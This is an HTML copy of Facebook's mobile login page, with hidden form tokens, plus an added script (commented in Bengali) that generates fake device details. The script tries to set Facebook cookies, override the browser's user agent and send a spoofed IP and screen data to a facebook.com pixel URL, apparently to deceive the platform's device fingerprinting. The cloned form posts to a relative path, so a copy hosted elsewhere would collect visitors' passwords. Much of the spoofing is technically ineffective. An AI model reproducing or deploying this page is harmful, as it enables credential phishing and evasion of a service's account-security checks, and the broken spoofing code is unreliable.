<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="user-scalable=no, initial-scale=1, maximum-scale=1">
  <title>Log in to Facebook | Facebook</title>
  <link rel="shortcut icon" href="https://z-m-static.xx.fbcdn.net/rsrc.php/v4/yi/r/4Kv5U5b1o3f.png" sizes="196x196">
  <meta name="referrer" content="origin-when-crossorigin">
  <meta name="theme-color" content="#3b5998">
  <link rel="stylesheet" href="https://z-m-static.xx.fbcdn.net/rsrc.php/v5/yR/l/0,cross/1kv39AMa5q3.css">
  <link rel="stylesheet" href="https://z-m-static.xx.fbcdn.net/rsrc.php/v5/yC/l/0,cross/KTLbCN2rbDn.css">
  <link rel="stylesheet" href="https://z-m-static.xx.fbcdn.net/rsrc.php/v5/yE/l/0,cross/7S_FZu0BWCg.css">
  <link rel="stylesheet" href="https://z-m-static.xx.fbcdn.net/rsrc.php/v5/yt/l/0,cross/ddHfYouJX6t.css">
  <link rel="stylesheet" href="https://z-m-static.xx.fbcdn.net/rsrc.php/v5/yD/l/0,cross/nFXoyVxJ3Gl.css">
  <style>
    /* Random Device Generator বাটন এবং বক্সের স্টাইল */
    #randomDeviceBtn {
      padding: 10px 20px;
      font-size: 16px;
      background-color: #1877f2;
      color: white;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      margin: 20px auto;
      display: block;
    }
    #randomDeviceBtn:hover {
      background-color: #165dbb;
    }
    #infoBox {
      padding: 20px;
      background-color: #f0f2f5;
      border-radius: 10px;
      font-family: Arial, sans-serif;
      max-width: 500px;
      margin: 20px auto;
      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
    }
    #infoBox h2 {
      margin-top: 0;
      color: #1877f2;
    }
    #infoBox p {
      margin: 10px 0;
      font-size: 14px;
    }
  </style>
</head>
<body tabindex="0" class="touch x1 tablet android _fzu _50-3 iframe acw">
  <div id="viewport" data-kaios-focus-transparent="1">
    <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
    <div id="page">
      <div class="_129_" id="header-notices"></div>
      <div class="maxwidth _5soa acw" id="root" role="main" data-sigil="context-layer-root content-pane">
        <div class="_7om2">
          <div class="_4g34" id="u_0_0_eH">
            <div class="_5yd0 _2ph- _5yd1" style="display: none;" id="login_error" data-sigil="m_login_notice">
              <div class="_52jd"></div>
            </div>
            <div class="_9om_">
              <div class="_4-4l">
                <div id="login_top_banner" data-sigil="m_login_upsell login_identify_step_element">
                  <div class="_qw9 grouped aclb" id="u_0_1_N/">
                    <a href="market://details?id=com.facebook.katana&amp;referrer=utm_source%3Dmb%26utm_reg%3DC_DFZ9Zi8QY23Cqp0aqxX4-c&amp;referrer_params%5Blink_source%5D=fb_app_banner" target="_top" class="touchableArea first last area touchable acy apl abt abb" data-sigil="touchable marea">
                      <div class="ib cc">
                        <i class="img l img _2sxw" style="background-image: url(&#039;https://z-m-static.xx.fbcdn.net/rsrc.php/v4/yT/r/n3W4thOHk2L.png&#039;);background-repeat:no-repeat;background-size:100% 100%;-webkit-background-size:100% 100%;width:18px;height:32px;"></i>
                        <div class="c"><span class="fcl">Get Facebook for Android and browse faster.</span></div>
                      </div>
                    </a>
                  </div>
                </div>
                <div class="_7om2 _52we _2pid _52z6">
                  <div class="_4g34">
                    <a href="/login/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzQxMDI1NDI0LCJjYWxsc2l0ZV9pZCI6Nzk2MTcwNzM0NTY5ODY0fQ%3D%3D">
                      <img src="https://z-m-static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" width="112" class="img" alt="facebook">
                    </a>
                  </div>
                </div>
                <div class="_5rut">
                  <form method="post" action="/login/device-based/regular/login/?refsrc=deprecated&amp;lwv=100" class="mobile-login-form _9hp- _5spm" id="login_form" novalidate="1" data-sigil="m_login_form">
                    <input type="hidden" name="lsd" value="AVop8R6A3mg" autocomplete="off">
                    <input type="hidden" name="jazoest" value="2894" autocomplete="off">
                    <input type="hidden" name="m_ts" value="1741025424">
                    <input type="hidden" name="li" value="kPDFZ4Xkuwy8H8ChDvLYa1NM">
                    <input type="hidden" name="try_number" value="0" data-sigil="m_login_try_number">
                    <input type="hidden" name="unrecognized_tries" value="0" data-sigil="m_login_unrecognized_tries">
                    <div id="user_info_container" data-sigil="user_info_after_failure_element"></div>
                    <div id="pwd_label_container" data-sigil="user_info_after_failure_element"></div>
                    <div id="otp_retrieve_desc_container"></div>
                    <div>
                      <div class="_56be">
                        <div class="_55wo _56bf">
                          <div class="_96n9" id="email_input_container">
                            <input autocorrect="off" autocapitalize="off" type="email" class="_56bg _4u9z _5ruq _8qtn" autocomplete="on" id="m_login_email" name="email" placeholder="Mobile number or email address" data-sigil="m_login_email">
                          </div>
                        </div>
                      </div>
                      <div class="_55wq"></div>
                      <div class="_56be">
                        <div class="_55wo _56bf">
                          <div class="_1upc _mg8" data-sigil="m_login_password">
                            <div class="_7om2">
                              <div class="_4g34 _5i2i _52we">
                                <div class="_5xu4">
                                  <input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2 _8qtm" autocomplete="on" id="m_login_password" name="pass" placeholder="Password" type="password" data-sigil="password-plain-text-toggle-input">
                                </div>
                              </div>
                              <div class="_5s61 _216i _5i2i _52we">
                                <div class="_5xu4">
                                  <div class="_2pi9" style="pointer-events: auto;;display:none" id="u_0_2_J1" data-sigil="password-plain-text-toggle">
                                    <a href="#"><span class="mfss" style="display:none" id="u_0_3_a9">HIDE</span><span class="mfss" id="u_0_4_/8">SHOW</span></a>
                                  </div>
                                </div>
                              </div>
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                    <div class="_2pie" style="text-align:center;">
                      <div id="login_password_step_element" data-sigil="login_password_step_element">
                        <button type="submit" value="Log in" class="_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu" name="login" data-sigil="touchable login_button_block m_login_button">
                          <span class="_55sr">Log in</span>
                        </button>
                      </div>
                      <div class="_7eif" id="oauth_login_button_container" style="display:none"></div>
                      <div class="_7f_d" id="oauth_login_desc_container" style="display:none"></div>
                      <div id="otp_button_elem_container"></div>
                    </div>
                    <input type="hidden" name="prefill_contact_point" id="prefill_contact_point">
                    <input type="hidden" name="prefill_source" id="prefill_source">
                    <input type="hidden" name="prefill_type" id="prefill_type">
                    <input type="hidden" name="first_prefill_source" id="first_prefill_source">
                    <input type="hidden" name="first_prefill_type" id="first_prefill_type">
                    <input type="hidden" name="had_cp_prefilled" id="had_cp_prefilled" value="false">
                    <input type="hidden" name="had_password_prefilled" id="had_password_prefilled" value="false">
                    <input type="hidden" name="is_smart_lock" id="is_smart_lock" value="false">
                    <input type="hidden" id="bi_xrwh" name="bi_xrwh" value="92004344361786634">
                    <input type="hidden" id="scetoggle">
                    <div class="_xo8"></div>
                    <noscript>
                      <input type="hidden" name="_fb_noscript" value="true">
                    </noscript>
                  </form>
                  <div>
                    <div class="_2pie _9omz">
                      <div class="_52jj _9on1">
                        <a class="_9on1" tabindex="0" href="/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzQxMDI1NDI0LCJjYWxsc2l0ZV9pZCI6Mjg0Nzg1MTQ5MzQ1MzY5fQ%3D%3D&amp;c=https%3A%2F%2Fmbasic.facebook.com%2Flogin%2F&amp;r&amp;cuid&amp;ars=facebook_login&amp;lwv=100" id="forgot-password-link">Forgotten password?</a>
                      </div>
                    </div>
                    <div style="padding-top: 42px">
                      <div>
                        <div>
                          <div>
                            <div id="login_reg_separator" class="_43mg _8qtf" data-sigil="login_reg_separator">
                              <span class="_43mh">or</span>
                            </div>
                            <div class="_52jj _5t3b" id="signup_button_area">
                              <a role="button" class="_agmp _28le btn btnS medBtn mfsm touchable" id="signup-button" href="https://www.facebook.com/reg-no-deeplink/?is_two_steps_login=0&amp;cid=103" tabindex="0" data-sigil="m_reg_button" target="_blank">Create new account</a>
                              <div class="_2pif">
                                <span class="_52jj mfss fcg">
                                  <div> By proceeding, you also agree to the <a href="https://lm.facebook.com/l.php?u=https%3A%2F%2Fwww.grameenphone.com%2Fpersonal%2Fservices%2Fdigital-services%2Feasynet&amp;h=AT2xkzIVVCBchX8o_jCpwxKvJY-MailMNDahVEFnv_BYxRY1kAyE55Z0EwFxchD3fFufWS0w3XxFLQFCRT3du_wFlk60z4zZMxaFfYCtiHyOUa3DOksKy-F5O4FT6FBd1r3HlVDBtFF1B8xngAC4xim34TEspr64C8CPoQ" rel="noreferrer nofollow" target="_blank" data-lynx-mode="asynclazy">Grameenphone Terms and Conditions</a>.<br> This service is not available while roaming. </div>
                                </span>
                              </div>
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>

  <!-- Random Device Generator বাটন এবং তথ্য বক্স -->
  <button id="randomDeviceBtn">Generate Random Device Info</button>
  <div id="infoBox" style="display: none;">
    <h2>Generated Device Info</h2>
    <p><strong>IP Address:</strong> <span id="ipAddress">N/A</span></p>
    <p><strong>Pixel Ratio:</strong> <span id="pixelRatio">N/A</span></p>
    <p><strong>Screen Resolution:</strong> <span id="screenResolution">N/A</span></p>
    <p><strong>User Agent:</strong> <span id="userAgent">N/A</span></p>
  </div>

  <script>
    // র্যান্ডম ডিভাইসের তথ্য জেনারেট করার ফাংশন
    function generateRandomDeviceInfo() {
      // র্যান্ডম আইপি জেনারেট করুন
      const randomIP = Array.from({ length: 4 }, () => Math.floor(Math.random() * 256)).join('.');

      // র্যান্ডম পিক্সেল রেশিও (1.00 থেকে 3.00)
      const randomPixelRatio = (Math.random() * 2 + 1).toFixed(2);

      // র্যান্ডম স্ক্রিন রেজোলিউশন (800x600 থেকে 3840x2160)
      const randomScreenWidth = Math.floor(Math.random() * 3040) + 800;
      const randomScreenHeight = Math.floor(Math.random() * 1560) + 600;

      // র্যান্ডম ইউজার এজেন্ট জেনারেট করুন
      const browsers = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
        "Mozilla/5.0 (Linux; Android 10; SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36",
      ];
      const randomUserAgent = browsers[Math.floor(Math.random() * browsers.length)];

      // র্যান্ডম ডিভাইসের তথ্য রিটার্ন করুন
      return {
        ip: randomIP,
        pixelRatio: randomPixelRatio,
        screenWidth: randomScreenWidth,
        screenHeight: randomScreenHeight,
        userAgent: randomUserAgent,
      };
    }

    // Facebook-এর কাছে র্যান্ডম ডিভাইসের তথ্য পাঠানোর ফাংশন
    function sendRandomDeviceInfoToFacebook() {
      const deviceInfo = generateRandomDeviceInfo();

      // কুকিজে র্যান্ডম ডিভাইসের তথ্য সেট করুন
      document.cookie = `m_pixel_ratio=${deviceInfo.pixelRatio}; path=/; domain=.facebook.com; secure`;
      document.cookie = `wd=${deviceInfo.screenWidth}x${deviceInfo.screenHeight}; path=/; domain=.facebook.com; secure`;

      // র্যান্ডম ইউজার এজেন্ট সেট করুন
      Object.defineProperty(navigator, 'userAgent', {
        value: deviceInfo.userAgent,
        configurable: false,
        writable: false,
      });

      // Facebook-এর কাছে র্যান্ডম ডেটা পাঠানোর জন্য একটি ইমেজ ট্যাগ তৈরি করুন
      const img = new Image();
      img.src = `https://facebook.com/security/hsts-pixel.gif?ip=${deviceInfo.ip}&pixel_ratio=${deviceInfo.pixelRatio}&screen=${deviceInfo.screenWidth}x${deviceInfo.screenHeight}&ua=${encodeURIComponent(deviceInfo.userAgent)}`;
      document.body.appendChild(img);

      // তথ্য বক্সে ডেটা দেখান
      document.getElementById("ipAddress").textContent = deviceInfo.ip;
      document.getElementById("pixelRatio").textContent = deviceInfo.pixelRatio;
      document.getElementById("screenResolution").textContent = `${deviceInfo.screenWidth}x${deviceInfo.screenHeight}`;
      document.getElementById("userAgent").textContent = deviceInfo.userAgent;

      // তথ্য বক্সটি দেখান
      document.getElementById("infoBox").style.display = "block";

      // র্যান্ডম ডিভাইসের তথ্য কনসোলে দেখান
      console.log("Random Device Info Sent to Facebook:", deviceInfo);
    }

    // বাটনে ক্লিক ইভেন্ট যোগ করুন
    document.getElementById("randomDeviceBtn").addEventListener("click", function () {
      sendRandomDeviceInfoToFacebook();
      alert("Random device info generated and sent to Facebook!");
    });
  </script>
</body>
</html>